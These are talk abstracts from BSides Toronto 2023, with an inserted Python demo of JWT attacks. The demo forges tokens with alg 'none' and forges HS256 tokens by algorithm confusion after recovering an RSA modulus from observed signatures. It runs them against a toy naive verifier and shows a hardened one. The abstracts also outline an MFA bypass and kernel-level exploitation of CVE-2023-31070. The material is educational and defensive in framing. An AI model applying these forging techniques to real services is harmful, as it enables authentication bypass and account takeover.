BSides Toronto 2023
You haven’t slept in days. Pager alerts at all hours. Constant firefights. How do you get out of this mess? This talk gives away all the secrets you’ll need to go from reactive chaos to building and running a finely tuned detection & response program (and finally get some sleep).
Gone are the days of buying the ol' EDR/IDS/NGAV combo, throwing some engineers on an on-call rotation, and calling it your incident response team. You need a robust and comprehensive detection and response program to fight modern-day attackers. But there are a lot of challenges in the way: alert fatigue, expensive tools, talent that is impossibly difficult to hire, and a current team that is overworked from constant firefights.
How do you successfully build a modern detection and response program, all while riding the rocket of never ending incidents and unforgiving on-call schedules?
This talk addresses the lack of a framework, which has led to ineffective, outdated, and afterthought detection and response programs. At the end of this talk, you will walk away with a better understanding of all the capabilities a modern program should have, and a framework to build or improve your own.
Microsoft Azure and Entra ID have become mainstays in modern corporate environments, and as cloud environments grow, so does their complexity. Many organizations have implemented Multi-Factor Authentication (MFA) and use Conditional Access Policies (CAPs) in their Azure tenant to enforce MFA requirements. We'll walk through a technique we developed to bypass browser-based MFA and gain access to Outlook Web App by leveraging an overly permissive Conditional Access Policy.
Nowadays, JSON Web Tokens (JWTs) are everywhere: as session tokens, as OAuth tokens, or simply to pass information between applications or microservices. By design, JWTs carry a large number of security and cryptography pitfalls that create interesting vulnerabilities. In this workshop, we are going to learn how to exploit some of those issues.
First, we are going to look at the classic issues: the none algorithm, and guessing or brute-forcing the HMAC secret.
Then we will look at more recent issues: how an RSA public key can be computed from multiple signatures in order to exploit algorithm confusion, and how the same attack can be done with ECDSA. We will also look at leveraging issues with the kid, jku and x5u header parameters. Finally, we will see how to leverage CVE-2022-21449 (the Java ECDSA "Psychic Signatures" bug, which accepted signatures with r = s = 0) to bypass the signature check entirely.
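As an added example (not part of the workshop material or of any real library), the following Python puts three of the issues above side by side: a naive verifier that trusts the header's alg (so it accepts alg "none" and, for HS256, feeds the RSA public key bytes in as the HMAC secret), the attacker-side recovery of the RSA modulus from nothing but observed RS256 tokens (n divides every s^e - pad(m), so a gcd over a few tokens yields it), and the hardened verifier that pins the algorithm server-side. The RSA key is a constructed toy built from two Mersenne primes with e = 17 so the gcd stays cheap (real keys use e = 65537; the maths is identical but the integers are much larger, which is why real tools use gmpy), `export_public_key` is an assumed text stand-in for the PEM bytes a real server would load from disk, and the PKCS#1 v1.5 encoding is the real one RS256 uses.

```python
import base64, hashlib, hmac, json, math


def b64u(data):                        # base64url without padding (RFC 7515)
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64u_dec(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


# Toy RSA key built from two Mersenne primes. Constructed for the demo only:
# never use a key like this, but the RSA / PKCS#1 v1.5 arithmetic below is real.
P, Q = 2**127 - 1, 2**607 - 1
N = P * Q
E = 17                                 # coprime to (P-1)(Q-1) for these primes; real keys use 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8          # modulus size in bytes (= RS256 signature length)
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")


def emsa_pkcs1_v15(msg, k=K):
    """EMSA-PKCS1-v1_5 encoding of SHA-256(msg): exactly the integer RS256 signs."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    em = b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t
    return int.from_bytes(em, "big")


def rsa_sign(msg):
    return pow(emsa_pkcs1_v15(msg), D, N).to_bytes(K, "big")


def rsa_verify(msg, sig):
    return pow(int.from_bytes(sig, "big"), E, N) == emsa_pkcs1_v15(msg)


def export_public_key(n, e):
    """Assumed stand-in for the PEM bytes a server reads from disk."""
    return f"n={n:x},e={e:x}".encode()


SERVER_KEY = export_public_key(N, E)   # the one "key" the naive verifier loads


def jwt_encode(payload, alg, hmac_key=b""):
    header = b64u(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    signing_input = header + "." + b64u(json.dumps(payload).encode())
    if alg == "none":
        sig = b""
    elif alg == "HS256":
        sig = hmac.new(hmac_key, signing_input.encode(), hashlib.sha256).digest()
    elif alg == "RS256":
        sig = rsa_sign(signing_input.encode())
    else:
        raise ValueError("unsupported alg " + alg)
    return signing_input + "." + b64u(sig)


def naive_verify(token):
    """Trusts the header's alg and hands the same key bytes to whichever algorithm it names."""
    h, p, s = token.split(".")
    alg = json.loads(b64u_dec(h)).get("alg")
    signing_input, sig = (h + "." + p).encode(), b64u_dec(s)
    if alg == "none":                  # pitfall 1: an unsigned token is "valid"
        ok = True
    elif alg == "HS256":               # pitfall 2: the RSA public key becomes the HMAC secret
        expected = hmac.new(SERVER_KEY, signing_input, hashlib.sha256).digest()
        ok = hmac.compare_digest(sig, expected)
    elif alg == "RS256":
        ok = rsa_verify(signing_input, sig)
    else:
        ok = False
    return json.loads(b64u_dec(p)) if ok else None


def hardened_verify(token):
    """Pins the algorithm server-side; the header is never consulted to choose it."""
    h, p, s = token.split(".")
    if json.loads(b64u_dec(h)).get("alg") != "RS256":
        return None
    return json.loads(b64u_dec(p)) if rsa_verify((h + "." + p).encode(), b64u_dec(s)) else None


def recover_modulus(tokens, e=E):
    """Attacker side: from RS256 tokens alone, n = gcd over s_i^e - pad(m_i), since each
    of those differences is a multiple of n. e is guessed (65537 in practice, 17 here)."""
    g = 0
    for t in tokens:
        h, p, s = t.split(".")
        sig = b64u_dec(s)
        padded = emsa_pkcs1_v15((h + "." + p).encode(), len(sig))
        g = math.gcd(g, int.from_bytes(sig, "big") ** e - padded)
    for f in range(2, 1 << 16):        # strip any small cofactor the multiples happen to share
        while g % f == 0:
            g //= f
    return g


def forge_with_alg_confusion(tokens, payload):
    """HS256-sign with the recovered public key as the secret; naive_verify accepts it."""
    return jwt_encode(payload, "HS256", export_public_key(recover_modulus(tokens), E))


def demo():
    """Returns {name: (accepted_by_naive, accepted_by_hardened)} for three tokens."""
    observed = [jwt_encode({"sub": "user%d" % i, "role": "user"}, "RS256") for i in range(3)]
    evil = {"sub": "attacker", "role": "admin"}
    forged = {"none": jwt_encode(evil, "none"),
              "confusion": forge_with_alg_confusion(observed, evil)}
    return {name: (naive_verify(tok) is not None, hardened_verify(tok) is not None)
            for name, tok in list(forged.items()) + [("legit", observed[0])]}


if __name__ == "__main__":
    for name, (naive, hardened) in demo().items():
        print(f"{name:10s} naive={naive} hardened={hardened}")
```

Running `demo()` shows the two forged tokens accepted by `naive_verify` and rejected by `hardened_verify`, while the legitimate RS256 token passes both. The fix is not a better header parser: the server decides the algorithm and the key type, and the header's alg is at most compared against that decision.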
Sun Tzu said it best: "If you know the enemy and know yourself, you need not fear the result of a hundred battles." Understanding the adversary is essential when formulating cyber defenses today. Join us for an introduction to adversary emulation, where we'll introduce core concepts, terminology, and tooling with which you can build a FREE adversary emulation homelab.
Are you tired of constantly patching vulnerabilities in production systems? Would you prefer proactive security mitigation to reactive response? This presentation explores the lessons I learned building a culture of quality software engineering, and how that culture can mitigate vulnerabilities before they are ever written. The lessons discussed can help your organization break the inertia of endless patching, and instead benefit from consistent, meaningful improvement.
Privacy compliance is a hot, top-of-mind topic for legal, security, and governance teams alike, especially with the advent of GDPR and the Trans-Atlantic Data Privacy Framework. Here in Canada we have PIPEDA; in the US, CCPA/CPRA, NYPA, and more. What do these acronyms mean? What do the regulations cover? And, more importantly, how can legal, security, and governance together navigate this new era of data regulation without overwhelming ourselves with immense amounts of paperwork?
We'll walk through the fundamentals of a Privacy Program that covers the typical broad set of data and privacy regulations, and how such a program may work well (or not so well!) alongside existing security compliance regimes and legislation. We'll cover the core software components required to support a Privacy Program. Finally, we'll talk through how to build a successful Privacy Engineering team within your security organization, one that complements both your existing security engineering needs and your Privacy Legal functions.
And if we have time, we can talk about lessons learnt along the way. :)
The web public key infrastructure (PKI) secures HTTPS connections between browsers and websites using certificates. Today, when something goes wrong, browsers can't reliably find out that those certificates have been revoked. We examine past and future solutions to this problem, and how we can make progress on fixing revocation.
Conditional Access in Microsoft Entra ID, combined with Mobile Application Management (MAM) and Mobile Device Management (MDM) in Microsoft Intune, forms the core pillars for building zero-trust access controls for Microsoft 365 and Azure-published services. We will cover MDM and MAM policies, how Intune device compliance is applied in Conditional Access decisions at authentication time, and finish with a tested model for layered access, specifically as it relates to M365 across a variety of device trust states.
We will review common IaC and container scanners in the context of a modern build pipeline. Using examples, we will show how different IaC tools may hide some complexity but also make security-relevant settings inaccessible. We will also review how modern projects have evolved and how infrastructure as code has changed the landscape. Using real-world open-source examples, we will examine untracked infrastructure configurations in projects and their potential consequences. We will finish by discussing how whitebox security assessment fuelled by IaC may change risk and compliance assessments like SOC 2 and HIPAA in the future.
This research covers CVE-2023-31070, a slab-out-of-bounds write in the Efficient Multicast Forwarding (EMF) module of the Broadcom BCM47xx SDK, a Linux kernel component in IoT devices, with significant implications for IoT device security. The Broadcom BCM47xx SDK serves as the reference implementation for numerous router models, making it ubiquitous in the IoT landscape. The issue affects router devices from at least 14 manufacturers and more than 50 popular models, and therefore a significant share of small office/home office networking devices.
The EMF module, responsible for optimizing multicast traffic, is a crucial component, particularly in applications like IPTV.
Within this SDK, the flaw lies in the EMF kernel driver, emf.ko, primarily used for IGMP snooping. Through careful analysis and reverse engineering, the vulnerable code within emf.ko is dissected, revealing how an attacker can manipulate the kernel module's data structures with specially crafted data. The ultimate goal of this exploitation is kernel-mode code execution, posing a substantial security risk.
To illustrate the practical implications of CVE-2023-31070, a demonstration is provided, showcasing how an attacker can trigger an out-of-bounds access in the kernel space, eventually causing system crashes. This demonstration, conducted on an ASUS AC87U device, serves as a real-world example of the potential consequences of this vulnerability.
This research journey also sheds light on the complexity of addressing such vulnerabilities. Close collaboration with Broadcom was required to get a fix; however, Broadcom has no control over the security update process of its OEMs and customers. In many cases, the affected models are no longer supported, even though tens of thousands of units are still operating on public networks. This case study underscores the need for effective coordination when addressing vulnerabilities in interconnected systems.
This presentation will provide an in-depth examination of CVE-2023-31070, offering valuable insights into the IoT security landscape and the imperative to secure our interconnected devices. The talk aims to foster a discussion within the security community and raise awareness of the challenges posed by vulnerabilities in IoT ecosystems.